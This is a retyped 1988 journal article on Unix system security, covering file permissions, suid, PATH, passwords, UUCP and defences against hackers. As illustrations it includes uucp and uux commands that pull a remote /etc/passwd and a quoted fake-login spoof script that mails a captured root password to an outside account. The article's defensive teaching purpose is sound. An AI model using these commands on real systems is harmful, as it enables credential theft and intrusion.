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"Unix System Security Issues"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Typed by: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Whisky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(from Holland, Europe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From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Information Ag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Vol. 11, Number 2, April 1988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Written By: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Michael J. Knox and Edward D. Bowd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file was sent to me from a friend in Holland. I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t would be a good idea to present this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X-hacker community, to show that hackers do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m systems, but sometimes look for ways to secure f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xisting systems.  -- Jester Sluggo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elements that have lead to the popula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perating system in the world today. The most notable fac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ortability among hardware platforms and the interactiv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at it offers to users. In fact, these elements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o do with the succesful evolution of the Unix sys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market place. (1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Unix system expands further into industry and govern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handle Unix system security will no doubt become imperativ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US government is committing several millon dollars a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nix system and its supported hardware. (1)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the government are tremendous, and one can only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uture needs of security in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paper, we will cover some of the more fundament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s in the Unix system. Discussed are common causes of Uni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omise in such areas as file protecion, password se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 and hacker violations. In our conclusion, we will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ongoing effects in Unix system security, and their direct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ortability of the Unix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DIRECTORY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ix operating system environment, files and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in a tree structure with specific access modes. The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des, through permission bits (as octal digits), is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 security. Permission bits determine how users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the type of access they are allowed. There are thre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modes for all Unix system files and directories: the ow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, and others. Access to read, write and execute withi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types is also controlled by permission bits (Figure 1).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le security is convenient, but it has been criticized as an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ecurity comprom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missio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                        GROUP                  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wx            :             rwx            :         rw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=read  w=write  x=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w--w-r-x 1 bob csc532 70 Apr 23 20:10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------ 2 sam A1 2 May 01 12:01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.  File and directory modes: File shows Bob as the owne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permission. Group has write permission, while Other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execute permission. The directory gives a secure director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, writeable, or executable by Group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file protection mechanism is so important in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it stands to reason that the proper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its is required for overall security. Aside fro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ance, the most common area of file compromise has to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 of permission bits at file creation. In some syste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octal 644, meaning that only the file owner can wr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o a file, while all others can only read it. (3) In many "op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this may be acceptable. However, in cases wher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present, the access for reading by others should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utility umask does in fact satisfy this requiremen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etting, umask 027, would enable all permission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, disable write permission to the group, and disable per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thers (octal 750). By inserting this umask command i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ofile or .login file, the default will be overritten b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t file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MOD utility can be used to modify permission settings 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ies. Issuing the following comm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mod u+rwd,g+rw,g-w,u-rw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vide the file with the same protection as the umask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ctal 750). Permission bits can be relaxed with chmod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but at least initially, the file structure can be made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restrictive u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sponsible application of such utilities as umask and chmod,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nhance file system security. The Unix system, however, restr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urity defined by the user to only owner, group and others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wner of the file cannot designate file access to specific us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wack and Healy have pointed out, "The granularity of contro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 security) mechanisms is often insufficient in practice (...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ossible to grant one user write protection to a director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ing another read permission to the same directory. (4)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curity file security extension to the Unix system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s style access control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ccess mode vulnerabilities in mind, users should pa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to files and directories under their control, and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whenever possible. Even with the design limitations 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y, following a safe approach will ensure a more secur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D and SG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user id (suid) and set group id (sgid) identify the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wnership of a file. By setting the suid or sgid permissio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ecutable file, other users can gain acces to the sam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a the executable file) as that of the real file's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Bob's program bob.x be an executable file accessible to other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 executes bob.x, Mary becomes the new program owner. If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ecution bob.x requests access to file browse.txt, then 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previous read or write permission to browse.txt.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Mary and everyone else total access to the contents of browse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n she is not running bob.x. By turning on the suid bit of bob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 will have the same access permissions to browse.txt as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real owner, but she will only have access to browse.tx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bob.x. Hence, by incorperating suid or sgid, un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s will be prevented form accessing files like brows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is feature appears to offer substantial access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 files, it does have one critical drawback. Ther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ce that the superuser (system administrator) may have a w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others that is also set with suid. With some modif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's code (by a hacker), an executable file like this would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to become a superuser. Within a short period of ti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or could completely compromise system security and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cessible, even to other superusers. As Farrow (5) puts it, "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set-user-id copy of the shell owned by root is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e root passwo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ensate for this security threat, writable suid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ght out and eliminated by the system administrator. Reporting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y normal users is also essential in correcting existing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rotection is commonly overlooked component of fil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ix system. Many system administrators and users are una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, that "publicly writable directories provid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ies for compromising the Unix system security" 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s tend to make these "open" for users to move a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ublic files and utilities. This can be disastrous, sin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ubdirectories within writable directories can be mov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d with different versions, even if contain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dable or unwritable to others. When this happens, an unscrupu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r a "password breaker" may supplant a Trojan horse of a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system utility (e.g. ls, su, mail and so on). For example, ima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that the /bin directory is publicly writable. The perpe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first remove the old su version (with rm utility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his own fake su to read the password of users wh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writable directories can destroy system integrity,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can be just as damaging. Sometimes files and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to permit read access by other. This subtle convenien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unauthorized disclosure of sensitive data: a serious mat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information is lost to a business compet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general rule, therefore, read and write access should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but system administrative directories. Execute permis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ccess to needed files; however, users might explicitly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ey wish to use. This adds some protection to unread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ritable directories. So, programs like lp file.x in an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/ddr will print the contents of file.x, while ls/ddr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contents of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is an environment variable that points to a list of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searched when a file is requested by a process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arch is indicated by the sequence of the listed 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name. This variable is established at user logon and i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ers .profile of .log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user places the current directory as the first entry in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ograms in the current directory will be run first.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rectories with the same name will be ignored. Although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ccess is made easier with a PATH variable set up this wa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xpose the user to pre-existing Trojan ho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llustrate this, assume that a trojan horse, similar to the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contains an instruction that imparts access privileg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trator. The fake cat is placed in a public directory /usr/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user often works. Now if the user has a PATH vari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first, and he enters the cat command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his, the fake cat in /usr/his would be executed but no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located in /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prevent this kind of system violation, the PAT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orrectly set. First, if at all possible, exclud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first entry in the PATH variable and type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hen invoking Unix system commands. This enhances file se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more cumbersome to work with. Second, if th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cluded in the PATH variable, then it should always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. In this way, utilities like vi, cat, su and ls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rom systems directories like /bin and /usr/bin befor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authentication in the Unix system is accomplished by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. Though passwords offer an additional level of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physical constraints, they lend themselves to the greates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uter system compromise. Lack of user awareness and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s largely to this form of computer insecurity. This is tr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omputer facilities where password identification,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horization are required for the access of resources -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perating system is n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information in many time-sharing systems ar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files that are not ordinarily readable by users.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iffers in this respect, since it allows all users to hav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/etc/passwd file (FIGURE 2) where encrypted pass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r information are stored. Although the Unix system implem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way encryption method, and in most systems a modifi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ncryption standard (DES), password breaking methods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se methods, brute-force attacks are generally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, yet techniques involving the use of heuristics (good gu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nowledge about passwords) tend to be successful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tc/passwd file contains such useful information as the login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ields. Login names are especially rewarding to the "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er" since many users will use login variants for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ckward spelling, the appending of a single digit etc.).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ften contains items such as surname, given name,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, project name and so on. To quote Morris and Grampp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landmark paper on Unix system secu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n the case of logi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s made a survey of several dozen local machines, us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al passwords a collection of the 20 most common female first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followed by a single digit. The total number of passwords tried w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200. At least one of these 200 passwords turned out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password on every machine surve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s for comment fiel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...) if an intruder knows something about the people using a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hole new set of candidates is available. Family and friend's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registration numbers, hobbies, and pets are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ive categories to try interactively in the unlikely ev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urely mechanical scan of the password file turns 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ppo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given a persistent system violator, there is a strong evid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will find some information about users in the /etc/passw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 mind, it is obvious that a password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dable to everyone except those in charge of system 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:aN2z06ISmxKqQ:0:10:(Boss1),656-35-0989:/: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:9okduHy7sdLK8:09:122:No.992-3943:/usr:/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.  The /etc/passwd file. Note the comments field as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of the /etc/passwd file's readability does not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the basic problem with passwords. Educating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s is necessary to assure proper password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"good passwords are those that are at least six character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based on personal information, and have some non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ecially control) characters in them: 4score, my_name, luv2run" (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passwords should be changed periodically but users should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ng between two passwords. Different password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and files will aid in protecting sensitiv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passwords should never be available to unauthoriz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user ignorance about poor password choice will inevi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ystem more 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Unix system network is the UUCP system, which is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s that perform the file tranfers and command execu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ystems. (3) The problem with the UUCP system is that us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may access other users' files without access permissio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by Nowitz (9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ucp system, left unrestricted, will let any outside user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nd copy in/out any file that is readable/writable by a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user. It is up to the individual sites to be aware of th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 the protections that they feel free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mphasizes the importance of proper implementation b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four UUCP system commands to consider when look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ecurity with the Unix system. The first is uucp, a comm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files between two Unix systems. If uucp is no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the system administrator, any outside user ca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ommands and copy files from another login user. If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other system is known, one could use the uucp command to cop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system to their syste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uucp system2!/main/src/hisfile m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hisfile from system2 in the directory /main/src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ile in the current local directory. If file transfer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on either system, hisfile would not be sent.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, any file could be copied from a remote user -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file. The following would copy the rem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/etc/passwd file to the local file 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uucp system2!/etc/passwd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dministrators can address the uucp matter by restricting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 to the directory /user/spool/uucppublic. (8) If one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a file anywhere else, a message will be returned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mote access to path/file denied" and no file transfer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UUCP system command to consider is the uux. It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commands on remote Unix computers. This is calle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xecution and is most often used to send mail betwee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il executes the uux command intern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ility to execute a command on another system int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security problem if remote command execution is not limite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, a system should not allow users from another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uux "system1!cat&lt;/etc/passwd&gt;/usr/spool/uucppubli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cause system1 to send its /etc/passwd file to the sys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 public directory. The user of system2 would now ha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file. Therefore, only a few commands should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remotely. Often the only command allowed to run uux is r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ricted mai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UUCP system function is the uucico (copy in / copy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t performs the true communication work. Uucp or uux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call up other systems; instead they are queued and the uuc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itiates the remote processes. The uucico program us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uucp/USERFILE to determine what files a remote system may s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. Checks for legal files are the basis for security in USER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system administrator should carefully control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USERFILE controls security between two Unix syste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a call-back flag to be set. Therefore, some degree of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by requiring a system to check if the remot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before a call-back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UUCP function is the uuxqt. It controls the remo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The uuxqt program uses the file /usr/lib/uucp/L.cm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commands will run in response to a remot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For example, if one wishes to use the electronic mail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L.cmd file will contain the line rmail. Since uuxq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ommands will be allowed to execute remotely, command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omise system security should not be included in L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UNIX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UUCP network commands, one should also be cautio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command (call the Unix system). Cu permits a remote user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puter system. The problem with cu is that a user on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weak security can use cu to connect to a more secure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stall a Trojan horse on the stronger system. It is appar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should not be used to go from a weaker system to a stronger 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p to the system administrator to ensure that this neve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AREA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creased number of computers operating under the Unix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nsideration must be given to local area networks (LANs)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s are designed to transmit files between computers quickly,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been a priority with many LANs, but there are secure LA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It is the job of the system manager to investigat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s when employing L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REAS OF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umerous methods used by hackers to gain entry into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In the Unix system, Trojan horses, spoofs and suid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weapons used by trespas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jan horses are pieces of code or shell scripts which usually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le of a common utility but when activated by an unsuspect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some unexpected task for the trespasser. Among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rojan horses, it is the su masquerade that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 to the Unix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all that the /etc/passwd file is readable to others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nformation about all users - even root users. Consider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 could do if he were able to read this file and locate a roo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writable directory. He might easily plant a fake su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root password back to the hacker. A Trojan hors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often be avoided when various security measures are fo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an etc/passwd file with limited read acces, controlling w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and the PATH variable properly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oof is basically a hoax that causes an unsuspecting vict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at a masquerading computer funtion is actually a re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A very popular spool in many computer system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-login trap. By displaying a phoney login format, a hac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apture the user'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ine that a root user has temporarily deserted his terminal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 could quickly install a login process like the on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ris and Grampp (7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-n "login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ty -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-n "password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ty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%X%Y|mail outside|hacker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e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Logi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ty 0&gt;/dev/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e that the password of the root user is mailed to the hack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ompletely compromised the Unix system. The fake terminal-login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the user has incorrectly entered the password. It then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o the stty process, thereby leaving no trac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ion of spoofs, like most security hazards, must begin wit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. But an immediate solution to security is sometime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ducation can be effected. As for terminal-login spoof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keyboard-locking programs that protect the login sess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away from their terminals. (8, 10) These lock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keyboard-generated interrupts and wait for the user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to resume the termina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suid mode has been previously examined in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we merely indicate some suid solutions here. First, s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hould be used is there are no other alternatives. Unre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ds or sgids can lead to system compromise. Second, a "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" should be given to a process that escapes from a suid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ild process. The reason for this is that a nonprivileged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might inherit privileged files from its parents. Finally, s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hould be writable only by their owners, otherwise other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overwrite the fi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be seen that by applying some basic security principles,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void Trojan horses, spoofs and inappropriate suid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techniques used by hackers to compromise system se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use of good judgement and user education may go f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ing their occu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is paper we have discussed conventional approaches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ecurity by way of practical file management,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, and networking. While it can be argued that user ed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ount in maintaining Unix system security (11) factors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ill promote some degree of system insecurity. Adva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mechanisms through better-written software (12), centr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control (13) and identification devices may result in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estion now asked applies to the future of Unix system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xisting Unix systems accommodate the security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and industry? It appears not, at least for gover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projects. By following the Orange Book (14), a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d classification of secure computer systems, the Unix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s secure as the C1 criterion. A C1 system, which has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rating (D being the lowest) provides only discre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protection (DSP) against browsers or non-programme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this is insufficient as far as defense or proprietary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cerned. What is needed are fundamental changes to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system. This has been recognized by at least three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, Gould and Honeywell (15, 16, 17). Gould, in particular, h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 changes to the kernel and file system in order to produce a C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d Unix operating system. To achieve this, however, they have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ifice some of the portability of the Unix system. It is hop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ar future a Unix system with an A1 classific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d, though not at the expense of losing its value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Grossman, G R "How secure is 'secure'?" Unix Review Vol 4 no 8 (19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 50-63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Waite, M et al. "Unix system V primer" USA (1984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Filipski, A and Hanko, J "Making Unix secure" Byte (April 1986) pp 113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Kowack, G and Healy, D "Can the holes be plugged?" Computer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 18 (26 September 1984) pp 27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Farrow, R "Security issues and strategies for users" Unix/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pril 1986) pp 65-71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Farrow, R "Security for superusers, or how to break the Unix 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/World (May 1986) pp 65-70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Grampp, F T and Morris, R H "Unix operating system security" AT&amp;T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 Tech. J. Vol 63 No 8 (1984) pp 1649-1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Wood, P H and Kochan, S G "Unix system security" USA (1985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Nowitz, D A "UUCP Implementation description: Unix programm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. 2" AT&amp;T Bell Laboratories, USA (1984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Thomas, R "Securing your terminal: two approaches" Unix/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pril 1986) pp 73-7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Karpinski, D "Security round table (Part 1)" Unix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ctober 1984) p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Karpinski, D "Security round table (Part 2)" Unix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ctober 1984) p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Lobel, J "Foiling the system breakers: computer security an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" McGraw-Hill, USA (19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National Computer Security Center "Department of Defense tr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system evaluation criteria" CSC-STD-001-83, USA (1983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Stewart, F "Implementing security under Unix" Systems&amp;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ebruary 19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Schaffer, M and Walsh, G "Lock/ix: An implementation of Unix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 TCB" Proceedings of USENIX (19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Chuck, F "AT&amp;T System 5/MLS Product 14 Strategy" AT&amp;T Bell La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vernment System Division, USA (August 19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